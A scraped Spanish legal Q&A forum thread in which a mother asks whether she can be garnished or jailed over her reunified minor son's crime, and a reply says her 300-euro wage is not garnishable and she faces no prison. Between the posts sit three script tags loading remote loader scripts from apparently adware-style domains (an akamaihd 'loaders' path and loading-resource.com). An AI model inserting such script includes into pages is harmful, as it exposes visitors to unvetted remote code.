Hijo reagrupado comete un delito

hola tengo una duda,he reagrupado a un hijo menor de edad y al poco tiempo cometió un delito lo llevaron a juicio y esta pagando la pena en un centro de menores, la parte que fue agredida en el juicio no pidió indemnización, mi pregunta es, se que me van a demandar a mi por ser la tutora legal pero tengo un trabajo en el cual cobro 300 euros no se lo que me van a pedir pero me pueden embargar? O que me van hacer, si no puedo pagar la cantidad que me pidan, puedo ir a la cárcel por algo que yo no hice? Pues nunca he tenido problemas. Agradeciendo ante mano en lo que me puedan ayudar

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta

Respuesta
1

El salario mínimo interprofesional es inembargable, y ronda los 641€. Es decir, con un salario de 300€ no pueden embargarte.

Lo que pueden embargar son propiedades, como viviendas o vehículos, o el dinero que puedas tener en cuentas bancarias.

Respecto a ingresar en prisión, no vas a responder con privación de libertad por un delito de tu hijo, que además ya está pagando la pena en un centro de menores.

muchísimas gracias esto me deja muy tranquila gracias de verdad

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas